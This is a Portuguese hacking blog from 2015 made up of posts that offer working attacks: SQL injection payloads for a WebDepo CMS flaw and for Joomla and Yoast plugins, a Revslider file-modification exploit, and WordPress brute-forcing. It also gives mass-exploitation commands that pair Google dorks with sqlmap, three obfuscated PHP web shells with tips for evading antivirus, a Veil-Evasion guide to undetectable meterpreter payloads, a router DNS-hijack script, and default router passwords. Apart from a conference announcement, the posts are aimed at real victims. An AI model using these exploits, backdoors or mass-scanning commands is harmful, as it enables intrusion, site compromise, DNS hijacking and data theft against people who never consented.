Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

terça-feira, 31 de março de 2015

Inurlbr dorking + Wordpress brute forcing

[ Inurlbr dorking + Wordpress brute forcing ]

[ Inurlbr dorking + Wordpress brute forcing ]

    Eae galera, esses dias eu estava pesquisando algumas falhas em wordpress, então tive uma ideia de montar um script que realiza-se um bruteforce em wordpress's, Só que antes ele cata-se os sites com cms (Wordpress) e salva-se em um .txt.

    Pensei em fazer essa etapa de dorking na mão, mas pra quer ter esse trabalho todo quando se pode se utilizar o nosso scaner Inurlbr <3 com as dorks já definidas. Depois de catar as url na etapa de dorking com Inurlbr, Montei o script que verifica se aquela url trabalha ou não com Wordpress, caso não trabalhar ele te print na tela "Not is wordpress" caso contrario ele realizará o bruteforce com senhas padrões contidas dentro do código. No script tem poucas senhas mas você pode incrementar mas senhas ou se você tiver um pequeno conhecimento em python você pode colocar o script para carregar um wordlist.txt.

   A etapa de dorking você pode escolher em fazer manualmente ou deixar o script fazer por você, na execução ele ira te perguntar; Dorking use to find sites using the inurlbr? [Y][N].



[ COMMAND SCANNER INURLBR ]

  • ./inurlbr.php -q 1,6 --dork "[DORK]inurl:wp-content site:.com.br[DORK]inurl:wp-content/plugins/ site:.com.br" -s list.txt --comand-all "echo _TARGET_ >> list.txt"
  • Você pode adicionar mas dorks no comando do scanner, seperando elas com "[DORK]"

  [DEMO]






sexta-feira, 27 de março de 2015

(0DAY) WebDepo - SQL injection

EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL

Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepo, o mesmo possui falha de file_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.

AUTOR:       GoogleINURL
Blog:             http://blog.inurl.com.br
Twitter:         https://twitter.com/googleinurl
Fanpage:       https://fb.com/InurlBrasil
Pastebin:       http://pastebin.com/u/Googleinurl
GIT:              https://github.com/googleinurl
PSS:              http://packetstormsecurity.com/user/googleinurl
YOUTUBE:  http://youtube.com/c/INURLBrasil
PLUS:           http://google.com/+INURLBrasil



VENTOR:         http://www.webdepot.co.il
GET VULN:     wood=(id) / $wood=intval($_REQUEST['wood'])
  -----------------------------------------------------------------------------

DBMS: 'MySQL'
Exploit:      +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

DBMS: 'Microsoft Access'
Exploit:      +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
  -----------------------------------------------------------------------------

http://target.us/text.asp?wood=(id)+Exploit

GOOGLE DORK:   inurl:"text.asp?wood="
GOOGLE DORK:   site:il inurl:"text.asp?wood="
GOOGLE DORK:   site:com inurl:"text.asp?wood="  

Exploit:

Execute exploit:
--help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php WebDepoxpl.php -t target
  php WebDepoxpl.php -f targets.txt
  php WebDepoxpl.php -t target -p 'http://localhost:9090'

DOWNLOAD Exploit: http://pastebin.com/b6bWuw7k
  -----------------------------------------------------------------------------

EXPLOIT MASS USE SCANNER INURLBR
COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --command-all "php 0dayWebDepo.php -t '_TARGET_'"


EXPLOIT MASS USE SCANNER INURLBR COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'"

DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

VÍDEO 
  -----------------------------------------------------------------------------

A segunda falha:
Exploit fckeditor 2015
Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk  
GOOGLE DORK: inurl:"/text.asp?wood=" site:il
Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

A segunda falha: Exploit fckeditor 2015  GOOGLE DORK: inurl:"/text.asp?wood=" site:il Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

POC:
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

[2] - http://target.us/userfiles/file/{YOU_FILE}

quarta-feira, 25 de março de 2015

Aberto a Chamada de Trabalhos / Conferência O Outro Lado Security BSides São Paulo (Co0L BSidesSP)

Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP está aberta !!!

Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP está aberta !!!

A "Conferência O Outro Lado Security BSides São Paulo" (Co0L BSidesSP) é uma mini-conferência gratuita organizada por profissionais envolvidos com o mercado de segurança da informação. O principal objetivo da Co0L BSidesSP é o de permitir a inovação, discussão e a troca de conhecimento sobre segurança da informação e cultura hacker, em um clima descontraído e dentro de uma abordagem aonde estas disciplinas se complementam.
A Co0L BSidesSP faz parte das conferências “Security BSides” (www.securitybsides.com) existentes em vários países, com propósito de fomentar a comunidade local de segurança e que acontecem em conjunto com algum grande evento da área.
A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015. https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN (English Version) As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes). Datas Importantes:

A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015.

  1. https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP
  2. https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN (English Version)

As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes).
Datas Importantes:

  • - Data final para submissão de palestras e oficinas: 20/04
  • - Notificação aos autores selecionados: 23/03
  • - Divulgação da Agenda: 24/04
  • - Início das inscrições: 24/04
  • - Co0L BSidesSP v11: 24/05

terça-feira, 24 de março de 2015

WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

WORDPRESS EXPLOIT Revslider

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css.

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css. 

Enviando a requisição:
Via post com seguintes campos:
array(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
 "data" => "_YOU_HTML_ADD_"
 );

Dentro no campo data é onde enviamos nosso HTML modificado.
Nossa array post com os dados já previamente preechidos são enviados para seguinte
URL - POST: http://{target}/wp-admin/admin-ajax.php

Com todo processo terminado podemos verifica se foi modificado o HTML do alvo.
URL - FINAL:  http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css 

USANDO EXPLOIT : 
DOWNLOAD:  http://pastebin.com/a2LHiD7U

EXECUTE:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
         php exploit.php -t target
         php exploit.php -f targets
         php exploit.php -t target -p 'http://localhost:9090'



OUTPUT COMAND -t:
OUTPUT: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

OUTPUT COMAND -f targets.txt:
OUTPUT COMAND -f targets.txt:


Usando em massa com SCANNER INURLBR:
DOWNLOAD:
https://github.com/googleinurl/SCANNER-INURLBR 

COMANDO:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'

OUTPUT:
OUTPUT: ./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'

sábado, 21 de março de 2015

INURL - BRASIL / Simple Shell Backdoor

Maneiras simples de acesso escondido.

No desenvolvimento de software, a ofuscação é o ato deliberado de criação de código ofuscado, ou seja, de origem ou código de máquina que é difícil para o ser humano de entender. Como ofuscação em linguagem natural, pode usar expressões desnecessariamente rotunda para compor declarações.  Os programadores podem deliberadamente ofuscar código para esconder a sua finalidade (segurança pela obscuridade) ou a sua lógica, a fim de evitar a violação, impedir a engenharia reversa, ou como um quebra-cabeça ou desafio de lazer para alguém que lê o código fonte.  Programas conhecidos como obfuscators transformar código legível em código ofuscado usando várias técnicas.


Script php shell de exploração utilizando function nativos do PHP e tentando melhorar a dinâmica e forma de uso do script.
Para executar comandos em um servidor em sua SHELL podemos usar as seguintes functions nativas:

  1. shell_exec -  Executa um comando via shell e retorna a saída inteira como uma string.
  2. system - Executa um programa externo e mostra a saída.
  3. exec - Executa um programa externo.
  4. passthru - Executa um programa externo e mostra a saída crúa. 


Com o grande numero de scanners/aplicações de segurança que tem o objetivo procurar arquivos maliciosas em seus servidores, muitos estão optando por usar um script simples para escapar dos famigerados AV's ("nada é 100% juntando isso com ofuscação de código você tem mais invisibilidade ").
Tais scripts tem o objetivo de manter o acesso do atacante, logo abaixo temos 3 modelos de script php que nem um mostra nome de functions nativas php, script pequeno e objetivo.


[+MODEL-01 CODE >>
<?php $__=@base64_decode("c3lzdGVt");echo@$__(isset($_REQUEST[0])?$_REQUEST[0]:NULL);
?>

[+] MODEL-02 CODE >>
<?php
echo(`{$_REQUEST[0]}`);
?>


[+MODEL-03 CODE >>
<?php $_=$_REQUEST[0];@$__=@create_function('$_',base64_decode("ZWNobyhzaGVsbF9leGVjKCRfKSk7"));@$__($_); 
?>
SOURCE SCRIPTShttp://pastebin.com/D07wPKmA

Usando o script depois de upado:
EX: http://localhost/of.php?0={COMMAND_ENCOD_URL}

curl "http://localhost/of.php?0=uname%20-a%20%26%26%20ls%20-la"


Exemplo de RESULTADO:

Usando o script depois de upado:  EX: http://localhost/of.php?0={COMMAND_ENCOD_URL}  curl "http://localhost/of.php?0=uname%20-a%20%26%26%20ls%20-la"   Exemplo de RESULTADO:
OBS: Os 3 script exemplos foram anexados a um arquivo par gerar tal output.

OFUSCANDO SEU CÓDIGO:
No desenvolvimento de software, a ofuscação é o ato deliberado de criação de código ofuscado, ou seja, de origem ou código de máquina que é difícil para o ser humano de entender. Como ofuscação em linguagem natural, pode usar expressões desnecessariamente rotunda para compor declarações.

Os programadores podem deliberadamente ofuscar código para esconder a sua finalidade (segurança pela obscuridade) ou a sua lógica, a fim de evitar a violação, impedir a engenharia reversa, ou como um quebra-cabeça ou desafio de lazer para alguém que lê o código fonte.

Programas conhecidos como obfuscators transformar código legível em código ofuscado usando várias técnicas.
Serviço online FOPO:
FOPO creates equivalent PHP obfuscated code which requires no special server runtime for execution. It's not one-way encryption but it will keep curious eyes away from your code. Submitted code gets deleted immediately after obfuscation and is not stored in any way. If you have any comments or suggestions feel free to reach me at fopo@dynsur.com.  Note: In case you've lost the original source code and you are the proven owner of it, a one-way encrypted copy is saved within the obfuscated output and I'll kindly assist you in recovering it.
Obfuscator: http://fopo.com.ar/



# REF:
# http://php.net/manual/en/language.operators.execution.php#language.operators.execution
# https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell
# http://www.businessinfo.co.uk/labs/talk/Nonalpha.pdf
http://php.net/manual/pt_BR/book.exec.php
http://curl.haxx.se/docs/httpscripting.html
http://pastebin.com/D07wPKmA
http://fopo.com.ar/
http://en.wikipedia.org/wiki/Obfuscation_%28software%29

sexta-feira, 20 de março de 2015

Conhecendo Veil-framework

Veil-framework

Veil-framework

Veil-framework é uma coleção de ferramentas de segurança (red team) que implementam varios metodos de ataque, com foco
em burlar a detecçao dos anti-virus e 'Veil' é o super projecto para os lançamentos (stable) das ferramentas da veil-framework.
a framework é desenvolvida por: @Harmj0y, @ChrisTruncer, @TheMightyShiv.

E contem actualmente os seguintes modulos:
Veil-Evasion: uma ferramenta para gerar payloads indetectaveis (FUD) usando uma variedade de tecnicas e linguagens.
Veil-Catapult: um systema de entrega de payloads ao estilo do psexec (smb)
Veil-Pillage: uma ferramenta de pós-exploraçao modular (depois do alvo ser explorado)
Veil-PowerTools: projectos powershell com foco em operaçoes ofencivas
Veil-Ordnance: uma ferramenta para gerar shellcode e obfusca-lo usando 2 'encoders' escritos especialmente para este modulo.

Veil-framework: https://www.veil-framework.com/framework/veil-evasion/
Veil-framework (GITHUB): https://github.com/Veil-Framework/
e Veil super projecto (GITHUB): https://github.com/Veil-Framework/Veil
"e que recomendo á maioria dos usuarios a clonar e installar"
  1. [[ Download and install Veil Super Project ]]
  2. git clone https://github.com/Veil-Framework/Veil.git
  3. cd Veil
  4. chmod +x Install.sh
  5. ./install.sh
Como a framework é dividida em diferentes modulos seria dificil neste artigo me referir a todos eles, por isso vamos nos focar em descrever o modulo 'veil-Evasion' ( framework interface + command line syntax + cobalt strike 'cortana integration' ) que consiste na criação de payloads indetectaveis, deixando para outro artigo a descrição dos restantes modulos (veil-Catapult | Veil-Pillage | Veil-powerTools).





Veil-Evasion

A ferramenta de AV-evasão, escrita por Chris truncer chamada 'Veil-Evasion' propõe uma protecção eficaz contra a detecção de exploits autonomos, veil-evasion agrega varias tecnicas de injeção de shellcode em uma estrutura que simplifica o gerenciamento. Como framework Veil-Evasion possui varios recursos e inclui o seguinte:

1 - incorpora shellcode em uma variedade de linguagens de programaçao incluindo C, C#, Ruby, python
2 - pode integrar ferramentas externas como Hyperion (criptografia arquivo EXE com AES-128 bit) PEScrambler (obfuscate win32 binaries) e backdoor_factory (patch executaveis com shellcode e continuar a execução normal do estado anterior ao prepatched state)
3 - a sua funcionalidade pode ser 'scripted' para automatizar a implementação (command line syntax)
4 - payloads em python podem ser obfuscados/compilados em exe usando PyInstaller, Pwnstaller, Py2Exe.
5 - Veil-Evasion pode ser integrado no cobalt strike atravez da utilizaçao de um 'script cortana' (veil_evasion.cna) by Harmj0y.


Uma vez que um exploit foi criado, o tester deve verificar o payload contra o VirusTotal para garantir que ele não vai disparar um alerta quando é colocado no systema de destino, se a amostra é submetida directamente ao VirusTotal e é bandeirada (flag)  de comportamento como software malicioso, em seguida uma actualização de assinatura contra a apresentação pode ser libertada por antivirus (AV) fornecedores em menos de 1 hora, é por isso que os usuarios são advertidos com a mensagem:
"não enviar amostras para qualquer scanner online"

Veil-Evasion permite os testers de usar um check seguro contra VirusTotal. quando qualquer payload é gerado, um hash (SHA1) é criado e adicionado ao hashs.txt localizado no directorio do Veil-Framework (/usr/share/Veil-Evasion/hashs.txt), testers podem chamar o script 'checkvt' para apresentar os hashes para o VirusTotal, que irá verificar os valores de hash SHA1 contra a sua base de dados de mallware. se um payload Veil-Evasion desencadeia uma correspondencia, então o tester sabe que pode ser detectado pelo systema de destino. O 'checkvt' apresenta um resultado positivo (mallware) se 1 dos 44 AV's usados pelo Virus-Total o descobrir, (querendo dizer que ele pode ser considerado mallware só pelo AVG e mesmo assim a SHA1 ver flagged como mallware).

A equipe Veil-Evasion está começando algo que estamos chamando de "V-Day", para a vitória sobre a detecçao por parte dos AntiVírus. No dia 15 de cada mês pelo menos um novo módulo de carga útil (payload) será liberado.





   TUTORIAL 'c/meterpreter/rev_tcp' compiled to exe

list available payloads
TUTORIAL 'c/metrepreter/rev_tcp' compiled to exe  list available payloads


    select payload to be loaded
       select payload to be loaded


config payload settings
config payload settings


output payload name
output payload name


copy files to your home folder
copy files to your home folder


      lançar resource file (multi-handler): msfconsole -r inurlTuto_handler.rc
 lançar resource file (multi-handler): msfconsole -r inurlTuto_handler.rc


execute payload on target machine
execute payload on target machine




     'c/meterpreter/rev_tcp' compiled to exe (command line syntax)

   A framework tambem vem equipada de uma 'command line syntax' que pode ser usada para incorporar o Veil-Evasion nos nossos        propios projectos paralelos, e pode ser acedida com o command './Veil-Evasion.py -h' tambem nos podemos usar da 'syntax' da              ferramenta para criar o mesmo payload (c/meterpreter/rev_tcp) sem precisarmos de entrar na toolkit.

                                                                    Building payloads (command line syntax):
                 ./Veil-Evasion.py -p c/meterpreter/rev_tcp -c LHOST=192.168.1.68 LPORT=666 compile_to_exe=y -o inurlTuto
                    ./Veil-Evasion.py -p auxiliary/coldwar_wrapper -c original_exe=/home/pedro/putty.exe -o putty-backdoored
   ./Veil-Evasion.py -p ruby/meterpreter/rev_tcp -c LHOST=192.168.1.68 LPORT=666 compile_to_exe=y -o rubypayload-to-exe

Files de configuração da tookit podem ser encontrados em '/etc/veil/settings.py' e permite-nos configurar 'internal settings' como:
1 - Path to output the source of payloads 2 - Path to output compiled payloads
3 - Whether to generate a msf handler script and where to place it
4 - The path to pyinstaller for example: /opt/pyinstaller-2.0/



    '(armitage & cobalt strike) Veil-Evasion cortana integration'

Cortana é uma linguagem de scripting de ataque baseada em 'sleep' ambos escritos por raphael mudge,
cortana permite a manipulaçao avançada de armitage ou cobalt strike. Harmj0y construiu um script (.cna) para intregar o Veil-Evasion directamente no armitage ou cobalt strike usando 'cortana scripting', para carrega-lo basta seleccionar 'script' -> load e navegar ate ao 'veil_evasion.cna' script para intergrar o Veil-Evasion directamenta nas frameworks armitage ou cobalt strike.

na primeira execuçao voce sera solicitado a introduzir o path de instalaçao da Veil-Evasion, depois de carregar o script cortana, um menu Veil-Evasion sera aberto na barra superior (cobalt strike), clicando sobre ele abre o 'Veil-Evasion' menu que ira permitir que voce gere uma carga util (payload). "em armitage teremos que loadar o script cortana em: armitage -> scripts -> load"
original article: https://www.veil-framework.com/veil-evasion-cortana-integration/








'c/meterpreter/rev_tcp' video tutorial

By @peterubuntu10[at]sourceforge[dot]net @2015
aka [ r00t-3xp10it ]


terça-feira, 17 de março de 2015

[DSLink 260E] - Defaut Passwords DNS Change

xplDSLink260E SCANNER

Ah um tempo atrás eu estava pesquisando alguns router(roteadores) vulneráveis a diversos tipos de ataques mas comuns, Durante a pesquisa encontrei 10 routers com senhas padrões em apenas um range de ip do modelo DSLink 260E, Todos com senhas padrões e com (forms) para alteração de DNS! Nos 10 routers conseguir realizar a alteração de DNS.

Eae galera tudo certo ?

Ah um tempo atrás eu estava pesquisando alguns router(roteadores) vulneráveis a diversos tipos de ataques mas comuns, Durante a pesquisa encontrei 10 routers com senhas padrões em apenas um range de ip do modelo DSLink 260E, Todos com senhas padrões e com (forms) para alteração de DNS, Em 10 routers obtive sucesso realizando alteração de DNS.

Então desenvolvi um mini scanner em python, que realiza um pequeno bruteforce com usuários e senhas padrões definidos dentro do código e depois de encontrado usuário e senha ele envia um request get realizando a alteração dos DNS.

Então montei um mini scanner em python, que realiza um pequeno bruteforce com usuários e senhas padrões definidos dentro do código e depois de encontrado usuário e senha ele envia um request get realizando a alteração dos DNS.

Execução: 
  • root@jh00n:~/Desktop/codes# python xpl.py <IP>
  • [Aqui você será definido o ip do roteador]
  Retorno:

  • [ + ] DNS changed sucess in: 127.0.0.1 | user@password

[ + ] DNS changed sucess in: 127.0.0.1 | user@password
  • Em caso de sucesso o return "DNS changed sucess in: IP | user@password"
[ DEMO ] 

SCRIPT DOWNLOAD :
https://github.com/jh00nbr/xplDSLink260E/blob/master/xpl.py

 

MINI EXPLOIT: Joomla Simple Photo Gallery - SQL injection + VIDEO

Usando miniexploit para explorar em massa vários alvos.

Usando miniexploit para explorar em massa vários alvos. Title: Joomla Simple Photo Gallery - SQL injection Date : 13-03-2015 Vendor Homepage: https://www.apptha.com/ Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery Version : 1 Tested on : sqlmap

Title: Joomla Simple Photo Gallery - SQL injection
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap

POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]

Comando SQLMAP de exploração:
sqlmap  -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba

DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/


Agora vamos organizar nosso comando INURLBR  para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.

 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
Parâmetro organizado:
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'

Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection: 
http://pastebin.com/Gb5uhPKW
File: miniexploit.php

Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php


Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"

segunda-feira, 16 de março de 2015

Desenvolvendo Mini exploits, otimizando seu tempo.

Vamos otimizar nosso tempo criando mini exploits.

mini exploits defino da seguinte forma: É um conjunto de comandos que possibilita execução de varias rotinas, assim poupando tempo. A não ser que queira toda vez digitar sempre os mesmos parâmetros.
Criaremos um mini exploit que vamos usar junto ao SCANNER INURLBR, mas antes você deve entender os parâmetros especiais do scanner INURLBR que usaremos.
  1. _TARGET_ é um parâmetro especial que passando para que seja substituído pelo domínio do nosso alvo.
  2. _TARGETFULL_ é um parâmetro especial que passando para que seja substituído pela URL inteira do nosso alvo.
Mais detalhes:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Tais parâmetros são usados nos comandos de execução em terminal.
  • Comando --comand-vul {comando_terminal}--comand-vul Executa comandos no terminal para cada URL encontrada vulnerável.
  • Comando --comand-all {comando_terminal}--comand-all Executa comandos no terminal para todas URL's encontradas.
Ex:
Logica de uso:

O scanner INURLBR filtra os resultados dos motores de busca em seguida executando comandos no terminal através dos parâmetros --comands all & vul.

Com tal logica em mente agora podemos criar um mini exploit para executar o SQLMAP em ataques de sql injection, seja ele remoto ou localhost.

1 - Criaremos um miniexploit.php
2 - Agora vamos inserir nossa programação que captura o alvo e toma as devidas rotinas necessárias.

<?php

#COMENTÁRIO:  printando na tela uma mensagem.
echo "[+]  MINI exploit-SQLMAP\n"; 
#COMENTÁRIO: capturando o primeiro parâmetro passado para nosso script.
$target = $argv[1]; 
#COMENTÁRIO: comando sqlmap pronto agora vamos concatenar nosso alvo ao comando.
$command = "sqlmap -u '{$target}' --batch --random-agent --level 2 --risk 1  --answers='follow=N'";
#COMENTÁRIO: agora vamos usar function nativa do php para executar o SQLMAP contra nosso alvo.
system($command, $dados).empty($dados[0]) ? exit() : NULL;


?>


Executando nosso script:
php miniexploit.php http://www.target.com.br

Com nosso exploit funcionando agora vamos vincular com scanner INURLBR.
Comando INURLBR:
Se deseja usar filtro em motores de busca:
ex: php inurlbr.php --dork 'SUA_DORK' -s salvar.txt -q 1,6  --comand-all "php  miniexploit.php '_TARGETFULL_'"

Execução:
Comando INURLBR: Se deseja usar filtro em motores de busca: ex: php inurlbr.php --dork 'SUA_DORK' -s salvar.txt -q 1,6  --comand-all "php  miniexploit.php '_TARGETFULL_'"  Execução:
Comando executado:
./inurlbr.php --dork 'inurl:php site:.br inurl:(id|pag|new|abir|open|acess) & "Warning: "' -s save.txt -q 1,6 --command-all "php miniexploit.php '_TARGETFULL_'"

Tal logica pode ser usada para executar mais de um comando ou exploit especifico:
Exemplo em código PHP:
$target = $argv[1]; 
$command = "nmap -sV -p 22,80,21 {$target}";
system($command$dados);
$command = "nikto -h {$target}";
system($command$dados).empty($dados[0]) ? exit() : NULL;


Exemplo usando msfcli do metasploit  - Hunting For MSSQL:
$target = $argv[1]; 
$command = "msfcli auxiliary/scanner/mssql/mssql_ping RHOSTS={$target} E";
system($command$dados).empty($dados[0]) ? exit() : NULL;

Resultado é semelhante a isso:
[*] SQL Server information for $target:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed


Vídeo aula criando um script em Bash pra otimizar um ataque junto ao msfcli.


BAIXAR SCRIPT SCANNER INURLBR


REF'S:
hunting for MSSQL

msfcli-basics tutorial

msfcli provides a powerful command-line interface to the framework.

quinta-feira, 12 de março de 2015

WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection / MINI EXPLOIT SQLMAP + SCANNER INURLBR

O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.

O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.

Descrição Técnica:

A vulnerabilidade de injeção blind SQL autenticado pode ser encontrado dentro do arquivo'admin/class-bulk-editor-list-table.php'. Os parâmetros GET order by e ordem não são suficientemente higienizado antes de serem usados dentro de uma consulta SQL.

Line 529:

$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title';

Line 533:

order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );


Proof of Concept (PoC):
O seguinte pedido GET fará com que a consulta SQL possa executar e dormir por 10 segundos, se clicou no como um administrador autenticado, editor ou usuário autor.

http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc


DORK: inurl:admin.php?page=wpseo_bulk

Desenvolvi um mini exploit para ser executado junto com SCANNER INURLBR ou separadamente via da sua preferencia usando sqlmap para tal exploração.
O scanner INURLBR fará toda busca e em seguida o mine exploit vai explorá-lo com sqlmap.

Otimização:
FULLhttp://pastebin.com/gi1Q4NmQ

EXECUTE MINI EXPLOIT: php mini_exploit.php www.target.com.br
COMANDO INURLBR:
./inurlbr.php --dork 'inurl:admin.php?page=wpseo_bulk' -s seo.txt -q 1,6 --comand-all "php mini_exploit.php _TARGET_" 

REF:
https://wpvulndb.com/vulnerabilities/7841
http://cyberwarzone.com/sql-vulnerability-in-wordpress-seo-by-yoast-patch-immediatly/

Username e Senhas padrões de roteadores e modems

Se o Username ou Password estiver vazio significa que deve ser deixado em branco. Router Username Password (All Routers With DD-WRT v23 & v24 Firmware) root admin (All Routers With Routertech v2.8 Firmware) Admin Admin (All Routers With Tomato v1 Firmware) admin admin 2Wire – 1000HG (2Wire Firmware)   2Wire – 2071 (Prodigy Firmware)   2Wire – 2700HG-S (2Wire Firmware)   2Wire – 2700HGV-B2 (Sasktel Firmware)   2Wire – 2701-A (BigPond Firmware)   2Wire – 2701HG-B (AT&T Firmware)   2Wire – 2701HG-B (SBC Firmware)   2Wire – 2701HG-D (Qwest Firmware)   2Wire – 2701HG-G (Bell Firmware)   2Wire – 2701HG-G (Bell French Firmware)   2Wire – 2701HG-S (Embarq Firmware)   2Wire – 2701HG-T (Prodigy Firmware)   2Wire – 2701HGV-W (BigPond Firmware)   2Wire – 3800HGV-B (AT&T Firmware)   3COM – 3C510 (3COM Firmware)  admin 3COM – 3CRWDR100A-72 (3COM Firmware)  admin 3COM – 3CRWDR101A-75 (3COM Firmware)  admin 3COM – 3CRWDR200A-75 (3COM Firmware) admin admin 3COM – 3CRWE554G72T (3COM Firmware)  admin 3COM – 3CRWER100-75 (3COM Firmware)  admin 3COM – 3CRWER200-75 (3COM Firmware)  admin 3com – Superstack 2 3C16980 (Canopy Firmware)   Abbatec – TX3 (Abbatec Firmware) admin admin Abocom – WAP-354NB (Abocom Firmware)   Abocom – WR254 